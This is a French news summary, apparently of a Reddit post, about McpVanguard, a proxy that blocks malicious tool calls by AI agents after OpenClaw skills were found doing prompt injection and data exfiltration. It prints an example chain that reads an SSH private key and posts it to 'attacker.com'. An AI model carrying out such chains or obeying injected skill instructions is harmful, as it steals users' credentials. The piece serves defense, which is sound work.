Le proxy McpVanguard bloque l'exfiltration des données de compétence OpenClaw

En réponse à la découverte par l'équipe de sécurité IA de Cisco de compétences tierces OpenClaw effectuant une exfiltration silencieuse de données et une injection d'invite, un développeur a publié McpVanguard, un proxy conçu pour s'interposer entre un agent d'IA et ses outils afin de bloquer les appels malveillants avant leur exécution.
Le problème : les appels malveillants en chaîne
Le problème de sécurité n'est pas un bogue dans OpenClaw lui-même, mais une conséquence du fait que les agents ont un accès au système de fichiers, une exécution de shell et des appels réseau sans limites d'application. Les tests de Cisco ont révélé un schéma où des appels individuels apparemment inoffensifs se combinent pour créer une violation, comme :
read_file("~/.ssh/id_rsa") → http_post("attacker.com", contents)Aucun appel ne semble malveillant isolément, mais ensemble, ils exfiltrent des données sensibles. Selon la source, ClawHub comptait plus de 820 compétences malveillantes à son apogée, et CVE-2026-25253 permettait aux attaquants d'obtenir une exécution de code à distance via un seul lien malveillant. La validation actuelle au niveau des compétences ne parvient pas à détecter ces séquences d'appels en chaîne.
La solution : le proxy McpVanguard
McpVanguard aborde ce problème en interceptant les appels entre l'agent et ses outils. Il utilise trois méthodes de détection :
- Correspondance de motifs
- Évaluation de l'intention sémantique
- Détection des chaînes comportementales sur l'ensemble de la session
L'installation se fait via pip : pip install mcp-vanguard.
Couche plus profonde : le protocole VEX
Le projet inclut une couche de sécurité plus profonde appelée protocole VEX, décrite comme un système « enregistreur de vol ». Il fournit :
- Des pistes d'audit Merkle pour une journalisation résistante à la falsification
- Une vérification d'identité de l'agent ancrée dans un TPM
- Une application au niveau des appels système
Le protocole VEX est construit en Rust et son développement a commencé en décembre 2023, avant qu'OpenClaw ne gagne en popularité. La source note que NVIDIA a récemment livré NemoClaw pour des objectifs de sécurité similaires, indiquant que ce type de menace ne va pas disparaître.
Les deux projets sont disponibles sur GitHub :
📖 Read the full source: r/openclaw
👀 See Also

Le code source de Claude aurait été divulgué via un fichier map NPM
Un tweet rapporte que le code source de Claude Code a été divulgué via un fichier map dans leur registre NPM. La discussion sur HN compte 93 points et 35 commentaires.

La défense par délimiteur fait passer Gemma 4 de 21% à 100% de défense contre l'injection de prompts dans un test de référence de plus de 6100 tests.
Un benchmark a testé 15 modèles sur 7 types d'attaques (plus de 6100 tests) en utilisant des délimiteurs aléatoires autour du contenu non fiable. Gemma 4 E4B est passé de 21,6 % à 100 % de taux de défense avec délimiteur + prompt strict.

Piratage du chiffrement de la médiation AppLovin : l'empreinte numérique des appareils contourne l'ATT
Le reverse engineering a révélé que le chiffrement personnalisé d'AppLovin utilise un sel constant + une clé SDK, un PRNG SplitMix64, et aucune authentification. Les requêtes déchiffrées transportent environ 50 champs sur l'appareil (modèle matériel, taille d'écran, locale, heure de démarrage, etc.) même lorsque ATT est refusé, permettant une ré-identification déterministe entre applications.

Surveillance des commandes OpenClaw avec Python et Gemini Flash pour la sécurité
Un utilisateur a créé un script Python qui suit les commandes injectées par OpenClaw, les analyse avec Gemini Flash et envoie des notifications via un webhook Discord pour toute activité alarmante ou irrégulière, pour un coût d'environ 0,14 $ par jour.